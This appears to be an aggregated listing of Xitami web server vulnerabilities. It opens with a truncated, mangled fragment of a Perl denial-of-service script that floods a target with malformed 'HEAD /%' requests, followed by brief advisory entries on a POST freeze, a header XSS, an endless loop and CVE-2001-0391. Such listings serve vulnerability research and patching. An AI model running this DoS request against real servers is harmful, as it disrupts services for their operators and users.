Xitami Web Server 5.0 - Remote Denial of Service

!/usr/bin/perl Xitami HTTP Server \n"; print "- Exemple: file.pl 127.0.0.1 80\n"; exit; $ip = $ARGV0; $port = $ARGV1; print "+ Sending request...\n"; for$i=0;$inew Proto = "tcp", PeerAddr = "$ip", PeerPort = "$port" || die "- Failed\n"; print $socket "HEAD /% HTTP/1.0\r\n\r\n"; print "+ Done!\n";...

Xitami malformed header DoS

It is possible to freeze the remote web server by sending a malformed POST request. This is know to affect Xitami 2.5 and earlier versions. OpenVAS Vulnerability Test $Id: xitamiPOSTDoS.nasl 8023 2017-12-07 08:36:26Z teissa $ Description: Xitami malformed header DoS Authors: Michel Arboi Copyrigh...

Xitami testssi.ssi HTTP Header XSS

The remote Xitami server is distributed with a script for testing server-side includes, '/testssi.ssi'. This script is vulnerable to a cross-site scripting issue when sent a request with a malformed Host or User-Agent header. An attacker may exploit this flaw the steal the authentication...

XITAMI invalid request endless loop

If HTTP header doesn't contain ':' server goes into endless loop...

CVE-2001-0391

Xitami 2.5d4 and earlier allows remote attackers to crash the server via an HTTP request to the /aux directory...